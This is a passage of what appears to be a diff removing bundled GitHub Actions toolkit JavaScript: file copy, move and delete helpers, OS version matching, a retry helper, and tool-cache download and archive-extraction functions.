(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; -const assert_1 = __nccwpck_require__(9491); -const path = __importStar(__nccwpck_require__(1017)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -/** - * Copies a file or folder. - * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js - * - * @param source source path - * @param dest destination path - * @param options optional. See CopyOptions. - */ -function cp(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - const { force, recursive, copySourceDirectory } = readCopyOptions(options); - const destStat = (yield ioUtil.exists(dest)) ? 
yield ioUtil.stat(dest) : null; - // Dest is an existing file, but not forcing - if (destStat && destStat.isFile() && !force) { - return; - } - // If dest is an existing directory, should copy inside. - const newDest = destStat && destStat.isDirectory() && copySourceDirectory - ? path.join(dest, path.basename(source)) - : dest; - if (!(yield ioUtil.exists(source))) { - throw new Error(`no such file or directory: ${source}`); - } - const sourceStat = yield ioUtil.stat(source); - if (sourceStat.isDirectory()) { - if (!recursive) { - throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); - } - else { - yield cpDirRecursive(source, newDest, 0, force); - } - } - else { - if (path.relative(source, newDest) === '') { - // a file cannot be copied to itself - throw new Error(`'${newDest}' and '${source}' are the same file`); - } - yield copyFile(source, newDest, force); - } - }); -} -exports.cp = cp; -/** - * Moves a path. - * - * @param source source path - * @param dest destination path - * @param options optional. See MoveOptions. 
- */ -function mv(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - if (yield ioUtil.exists(dest)) { - let destExists = true; - if (yield ioUtil.isDirectory(dest)) { - // If dest is directory copy src into dest - dest = path.join(dest, path.basename(source)); - destExists = yield ioUtil.exists(dest); - } - if (destExists) { - if (options.force == null || options.force) { - yield rmRF(dest); - } - else { - throw new Error('Destination already exists'); - } - } - } - yield mkdirP(path.dirname(dest)); - yield ioUtil.rename(source, dest); - }); -} -exports.mv = mv; -/** - * Remove a path recursively with force - * - * @param inputPath path to remove - */ -function rmRF(inputPath) { - return __awaiter(this, void 0, void 0, function* () { - if (ioUtil.IS_WINDOWS) { - // Check for invalid characters - // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file - if (/[*"<>|]/.test(inputPath)) { - throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); - } - } - try { - // note if path does not exist, error is silent - yield ioUtil.rm(inputPath, { - force: true, - maxRetries: 3, - recursive: true, - retryDelay: 300 - }); - } - catch (err) { - throw new Error(`File was unable to be removed ${err}`); - } - }); -} -exports.rmRF = rmRF; -/** - * Make a directory. Creates the full path with folders in between - * Will throw if it fails - * - * @param fsPath path to create - * @returns Promise - */ -function mkdirP(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(fsPath, 'a path argument must be provided'); - yield ioUtil.mkdir(fsPath, { recursive: true }); - }); -} -exports.mkdirP = mkdirP; -/** - * Returns path of a tool had the tool actually been invoked. Resolves via paths. - * If you check and the tool does not exist, it will throw. 
- * - * @param tool name of the tool - * @param check whether to check if tool exists - * @returns Promise path to tool - */ -function which(tool, check) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // recursive when check=true - if (check) { - const result = yield which(tool, false); - if (!result) { - if (ioUtil.IS_WINDOWS) { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); - } - else { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); - } - } - return result; - } - const matches = yield findInPath(tool); - if (matches && matches.length > 0) { - return matches[0]; - } - return ''; - }); -} -exports.which = which; -/** - * Returns a list of all occurrences of the given tool on the system path. - * - * @returns Promise the paths of the tool - */ -function findInPath(tool) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // build the list of extensions to try - const extensions = []; - if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { - for (const extension of process.env['PATHEXT'].split(path.delimiter)) { - if (extension) { - extensions.push(extension); - } - } - } - // if it's rooted, return it if exists. otherwise return empty. 
- if (ioUtil.isRooted(tool)) { - const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); - if (filePath) { - return [filePath]; - } - return []; - } - // if any path separators, return empty - if (tool.includes(path.sep)) { - return []; - } - // build the list of directories - // - // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, - // it feels like we should not do this. Checking the current directory seems like more of a use - // case of a shell, and the which() function exposed by the toolkit should strive for consistency - // across platforms. - const directories = []; - if (process.env.PATH) { - for (const p of process.env.PATH.split(path.delimiter)) { - if (p) { - directories.push(p); - } - } - } - // find all matches - const matches = []; - for (const directory of directories) { - const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); - if (filePath) { - matches.push(filePath); - } - } - return matches; - }); -} -exports.findInPath = findInPath; -function readCopyOptions(options) { - const force = options.force == null ? true : options.force; - const recursive = Boolean(options.recursive); - const copySourceDirectory = options.copySourceDirectory == null - ? 
true - : Boolean(options.copySourceDirectory); - return { force, recursive, copySourceDirectory }; -} -function cpDirRecursive(sourceDir, destDir, currentDepth, force) { - return __awaiter(this, void 0, void 0, function* () { - // Ensure there is not a run away recursive copy - if (currentDepth >= 255) - return; - currentDepth++; - yield mkdirP(destDir); - const files = yield ioUtil.readdir(sourceDir); - for (const fileName of files) { - const srcFile = `${sourceDir}/${fileName}`; - const destFile = `${destDir}/${fileName}`; - const srcFileStat = yield ioUtil.lstat(srcFile); - if (srcFileStat.isDirectory()) { - // Recurse - yield cpDirRecursive(srcFile, destFile, currentDepth, force); - } - else { - yield copyFile(srcFile, destFile, force); - } - } - // Change the mode for the newly created directory - yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); - }); -} -// Buffered file copy -function copyFile(srcFile, destFile, force) { - return __awaiter(this, void 0, void 0, function* () { - if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { - // unlink/re-link it - try { - yield ioUtil.lstat(destFile); - yield ioUtil.unlink(destFile); - } - catch (e) { - // Try to override file permission - if (e.code === 'EPERM') { - yield ioUtil.chmod(destFile, '0666'); - yield ioUtil.unlink(destFile); - } - // other errors = it doesn't exist, no work to do - } - // Copy over symlink - const symlinkFull = yield ioUtil.readlink(srcFile); - yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); - } - else if (!(yield ioUtil.exists(destFile)) || force) { - yield ioUtil.copyFile(srcFile, destFile); - } - }); -} -//# sourceMappingURL=io.js.map - -/***/ }), - -/***/ 2473: -/***/ (function(module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; -const semver = __importStar(__nccwpck_require__(5911)); -const core_1 = __nccwpck_require__(2186); -// needs to be require for core node modules to be mocked -/* eslint @typescript-eslint/no-require-imports: 0 */ -const os = __nccwpck_require__(2037); -const cp = __nccwpck_require__(2081); -const fs = __nccwpck_require__(7147); -function _findMatch(versionSpec, stable, candidates, archFilter) { - return __awaiter(this, void 0, void 0, function* () { - const platFilter = os.platform(); - let result; - let match; - let file; - for (const candidate of candidates) { - const version = candidate.version; - core_1.debug(`check ${version} satisfies ${versionSpec}`); - if (semver.satisfies(version, versionSpec) && - (!stable || candidate.stable === stable)) { - file = candidate.files.find(item => { - core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); - let chk = item.arch === archFilter && item.platform === platFilter; - if (chk && item.platform_version) { - const osVersion = module.exports._getOsVersion(); - if (osVersion === item.platform_version) { - chk = true; - } - else { - chk = semver.satisfies(osVersion, item.platform_version); - } - } - return chk; - }); - if (file) { - core_1.debug(`matched ${candidate.version}`); - match = candidate; - break; - } - } - } - if (match && file) { - // clone since we're mutating the file list to be only the file that matches - result = Object.assign({}, match); - result.files = [file]; - } - return result; - }); -} -exports._findMatch = _findMatch; -function _getOsVersion() { - // TODO: add windows and other linux, arm variants - // right now filtering on version is only an ubuntu and macos scenario 
for tools we build for hosted (python) - const plat = os.platform(); - let version = ''; - if (plat === 'darwin') { - version = cp.execSync('sw_vers -productVersion').toString(); - } - else if (plat === 'linux') { - // lsb_release process not in some containers, readfile - // Run cat /etc/lsb-release - // DISTRIB_ID=Ubuntu - // DISTRIB_RELEASE=18.04 - // DISTRIB_CODENAME=bionic - // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" - const lsbContents = module.exports._readLinuxVersionFile(); - if (lsbContents) { - const lines = lsbContents.split('\n'); - for (const line of lines) { - const parts = line.split('='); - if (parts.length === 2 && - (parts[0].trim() === 'VERSION_ID' || - parts[0].trim() === 'DISTRIB_RELEASE')) { - version = parts[1] - .trim() - .replace(/^"/, '') - .replace(/"$/, ''); - break; - } - } - } - } - return version; -} -exports._getOsVersion = _getOsVersion; -function _readLinuxVersionFile() { - const lsbReleaseFile = '/etc/lsb-release'; - const osReleaseFile = '/etc/os-release'; - let contents = ''; - if (fs.existsSync(lsbReleaseFile)) { - contents = fs.readFileSync(lsbReleaseFile).toString(); - } - else if (fs.existsSync(osReleaseFile)) { - contents = fs.readFileSync(osReleaseFile).toString(); - } - return contents; -} -exports._readLinuxVersionFile = _readLinuxVersionFile; -//# sourceMappingURL=manifest.js.map - -/***/ }), - -/***/ 8279: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.RetryHelper = void 0; -const core = __importStar(__nccwpck_require__(2186)); -/** - * Internal class for retries - */ -class RetryHelper { - constructor(maxAttempts, minSeconds, maxSeconds) { - if (maxAttempts < 1) { - throw new Error('max attempts should be greater than or equal to 1'); - } - this.maxAttempts = maxAttempts; - this.minSeconds = Math.floor(minSeconds); - this.maxSeconds = Math.floor(maxSeconds); - if (this.minSeconds > this.maxSeconds) { - throw new Error('min seconds should be less than or equal to max seconds'); - } - } - execute(action, isRetryable) { - return __awaiter(this, void 0, void 0, function* () { - let attempt = 1; - while (attempt < this.maxAttempts) { - // Try - try { - return yield action(); - } - catch (err) { - if (isRetryable && !isRetryable(err)) { - throw err; - } - 
core.info(err.message); - } - // Sleep - const seconds = this.getSleepAmount(); - core.info(`Waiting ${seconds} seconds before trying again`); - yield this.sleep(seconds); - attempt++; - } - // Last attempt - return yield action(); - }); - } - getSleepAmount() { - return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + - this.minSeconds); - } - sleep(seconds) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise(resolve => setTimeout(resolve, seconds * 1000)); - }); - } -} -exports.RetryHelper = RetryHelper; -//# sourceMappingURL=retry-helper.js.map - -/***/ }), - -/***/ 7784: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; -const core = __importStar(__nccwpck_require__(2186)); -const io = __importStar(__nccwpck_require__(7436)); -const fs = __importStar(__nccwpck_require__(7147)); -const mm = __importStar(__nccwpck_require__(2473)); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const httpm = __importStar(__nccwpck_require__(6255)); -const semver = __importStar(__nccwpck_require__(5911)); -const stream = __importStar(__nccwpck_require__(2781)); -const util = __importStar(__nccwpck_require__(3837)); -const assert_1 = __nccwpck_require__(9491); -const v4_1 = __importDefault(__nccwpck_require__(7468)); -const exec_1 = __nccwpck_require__(1514); -const retry_helper_1 = __nccwpck_require__(8279); -class HTTPError extends Error { - constructor(httpStatusCode) { - super(`Unexpected HTTP response: ${httpStatusCode}`); - this.httpStatusCode = httpStatusCode; - Object.setPrototypeOf(this, new.target.prototype); - 
} -} -exports.HTTPError = HTTPError; -const IS_WINDOWS = process.platform === 'win32'; -const IS_MAC = process.platform === 'darwin'; -const userAgent = 'actions/tool-cache'; -/** - * Download a tool from an url and stream it into a file - * - * @param url url of tool to download - * @param dest path to download tool - * @param auth authorization header - * @param headers other headers - * @returns path to downloaded tool - */ -function downloadTool(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - dest = dest || path.join(_getTempDirectory(), v4_1.default()); - yield io.mkdirP(path.dirname(dest)); - core.debug(`Downloading ${url}`); - core.debug(`Destination ${dest}`); - const maxAttempts = 3; - const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); - const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); - const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); - return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { - return yield downloadToolAttempt(url, dest || '', auth, headers); - }), (err) => { - if (err instanceof HTTPError && err.httpStatusCode) { - // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests - if (err.httpStatusCode < 500 && - err.httpStatusCode !== 408 && - err.httpStatusCode !== 429) { - return false; - } - } - // Otherwise retry - return true; - }); - }); -} -exports.downloadTool = downloadTool; -function downloadToolAttempt(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (fs.existsSync(dest)) { - throw new Error(`Destination file path ${dest} already exists`); - } - // Get the response headers - const http = new httpm.HttpClient(userAgent, [], { - allowRetries: false - }); - if (auth) { - core.debug('set auth'); - if (headers === undefined) { - headers = {}; - } - headers.authorization = auth; - } - const response = yield 
http.get(url, headers); - if (response.message.statusCode !== 200) { - const err = new HTTPError(response.message.statusCode); - core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); - throw err; - } - // Download the response body - const pipeline = util.promisify(stream.pipeline); - const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); - const readStream = responseMessageFactory(); - let succeeded = false; - try { - yield pipeline(readStream, fs.createWriteStream(dest)); - core.debug('download complete'); - succeeded = true; - return dest; - } - finally { - // Error, delete dest before retry - if (!succeeded) { - core.debug('download failed'); - try { - yield io.rmRF(dest); - } - catch (err) { - core.debug(`Failed to delete '${dest}'. ${err.message}`); - } - } - } - }); -} -/** - * Extract a .7z file - * - * @param file path to the .7z file - * @param dest destination directory. Optional. - * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this - * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will - * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is - * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line - * interface, it is smaller than the full command line interface, and it does support long paths. At the - * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. - * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path - * to 7zr.exe can be pass to this function. 
- * @returns path to the destination directory - */ -function extract7z(file, dest, _7zPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - const originalCwd = process.cwd(); - process.chdir(dest); - if (_7zPath) { - try { - const logLevel = core.isDebug() ? '-bb1' : '-bb0'; - const args = [ - 'x', - logLevel, - '-bd', - '-sccUTF-8', - file - ]; - const options = { - silent: true - }; - yield exec_1.exec(`"${_7zPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - else { - const escapedScript = path - .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') - .replace(/'/g, "''") - .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - command - ]; - const options = { - silent: true - }; - try { - const powershellPath = yield io.which('powershell', true); - yield exec_1.exec(`"${powershellPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - return dest; - }); -} -exports.extract7z = extract7z; -/** - * Extract a compressed tar archive - * - * @param file path to the tar - * @param dest destination directory. Optional. - * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. 
- * @returns path to the destination directory - */ -function extractTar(file, dest, flags = 'xz') { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - // Create dest - dest = yield _createExtractFolder(dest); - // Determine whether GNU tar - core.debug('Checking tar --version'); - let versionOutput = ''; - yield exec_1.exec('tar --version', [], { - ignoreReturnCode: true, - silent: true, - listeners: { - stdout: (data) => (versionOutput += data.toString()), - stderr: (data) => (versionOutput += data.toString()) - } - }); - core.debug(versionOutput.trim()); - const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); - // Initialize args - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - if (core.isDebug() && !flags.includes('v')) { - args.push('-v'); - } - let destArg = dest; - let fileArg = file; - if (IS_WINDOWS && isGnuTar) { - args.push('--force-local'); - destArg = dest.replace(/\\/g, '/'); - // Technically only the dest needs to have `/` but for aesthetic consistency - // convert slashes in the file arg too. - fileArg = file.replace(/\\/g, '/'); - } - if (isGnuTar) { - // Suppress warnings when using GNU tar to extract archives created by BSD tar - args.push('--warning=no-unknown-keyword'); - args.push('--overwrite'); - } - args.push('-C', destArg, '-f', fileArg); - yield exec_1.exec(`tar`, args); - return dest; - }); -} -exports.extractTar = extractTar; -/** - * Extract a xar compatible archive - * - * @param file path to the archive - * @param dest destination directory. Optional. - * @param flags flags for the xar. Optional. 
- * @returns path to the destination directory - */ -function extractXar(file, dest, flags = []) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - args.push('-x', '-C', dest, '-f', file); - if (core.isDebug()) { - args.push('-v'); - } - const xarPath = yield io.which('xar', true); - yield exec_1.exec(`"${xarPath}"`, _unique(args)); - return dest; - }); -} -exports.extractXar = extractXar; -/** - * Extract a zip - * - * @param file path to the zip - * @param dest destination directory. Optional. - * @returns path to the destination directory - */ -function extractZip(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - dest = yield _createExtractFolder(dest); - if (IS_WINDOWS) { - yield extractZipWin(file, dest); - } - else { - yield extractZipNix(file, dest); - } - return dest; - }); -} -exports.extractZip = extractZip; -function extractZipWin(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - // build the powershell command - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const pwshPath = yield io.which('pwsh', false); - //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory - //and the -Force flag for Expand-Archive as a fallback - if (pwshPath) { - //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive - const pwshCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, - `try { 
[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, - `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` - ].join(' '); - const args = [ - '-NoLogo', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - pwshCommand - ]; - core.debug(`Using pwsh at path: ${pwshPath}`); - yield exec_1.exec(`"${pwshPath}"`, args); - } - else { - const powershellCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, - `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, - `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` - ].join(' '); - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - powershellCommand - ]; - const powershellPath = yield io.which('powershell', true); - core.debug(`Using powershell at path: ${powershellPath}`); - yield exec_1.exec(`"${powershellPath}"`, args); - } - }); -} -function extractZipNix(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - const unzipPath = yield io.which('unzip', true); - const args = [file]; - if (!core.isDebug()) { - args.unshift('-q'); - } - args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run - yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); - }); -} -/** - * Caches a directory and installs it into the tool cacheDir - * - * @param sourceDir the directory to cache into tools - * @param tool tool 
name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheDir(sourceDir, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source dir: ${sourceDir}`); - if (!fs.statSync(sourceDir).isDirectory()) { - throw new Error('sourceDir is not a directory'); - } - // Create the tool dir - const destPath = yield _createToolPath(tool, version, arch); - // copy each child item. do not move. move can fail on Windows - // due to anti-virus software having an open handle on a file. - for (const itemName of fs.readdirSync(sourceDir)) { - const s = path.join(sourceDir, itemName); - yield io.cp(s, destPath, { recursive: true }); - } - // write .complete - _completeToolPath(tool, version, arch); - return destPath; - }); -} -exports.cacheDir = cacheDir; -/** - * Caches a downloaded file (GUID) and installs it - * into the tool cache with a given targetName - * - * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. - * @param targetFile the name of the file name in the tools directory - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheFile(sourceFile, targetFile, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source file: ${sourceFile}`); - if (!fs.statSync(sourceFile).isFile()) { - throw new Error('sourceFile is not a file'); - } - // create the tool dir - const destFolder = yield _createToolPath(tool, version, arch); - // copy instead of move. 
move can fail on Windows due to - // anti-virus software having an open handle on a file. - const destPath = path.join(destFolder, targetFile); - core.debug(`destination file ${destPath}`); - yield io.cp(sourceFile, destPath); - // write .complete - _completeToolPath(tool, version, arch); - return destFolder; - }); -} -exports.cacheFile = cacheFile; -/** - * Finds the path to a tool version in the local installed tool cache - * - * @param toolName name of the tool - * @param versionSpec version of the tool - * @param arch optional arch. defaults to arch of computer - */ -function find(toolName, versionSpec, arch) { - if (!toolName) { - throw new Error('toolName parameter is required'); - } - if (!versionSpec) { - throw new Error('versionSpec parameter is required'); - } - arch = arch || os.arch(); - // attempt to resolve an explicit version - if (!isExplicitVersion(versionSpec)) { - const localVersions = findAllVersions(toolName, arch); - const match = evaluateVersions(localVersions, versionSpec); - versionSpec = match; - } - // check for the explicit version in the cache - let toolPath = ''; - if (versionSpec) { - versionSpec = semver.clean(versionSpec) || ''; - const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); - core.debug(`checking cache: ${cachePath}`); - if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { - core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); - toolPath = cachePath; - } - else { - core.debug('not found'); - } - } - return toolPath; -} -exports.find = find; -/** - * Finds the paths to all versions of a tool that are installed in the local tool cache - * - * @param toolName name of the tool - * @param arch optional arch. 
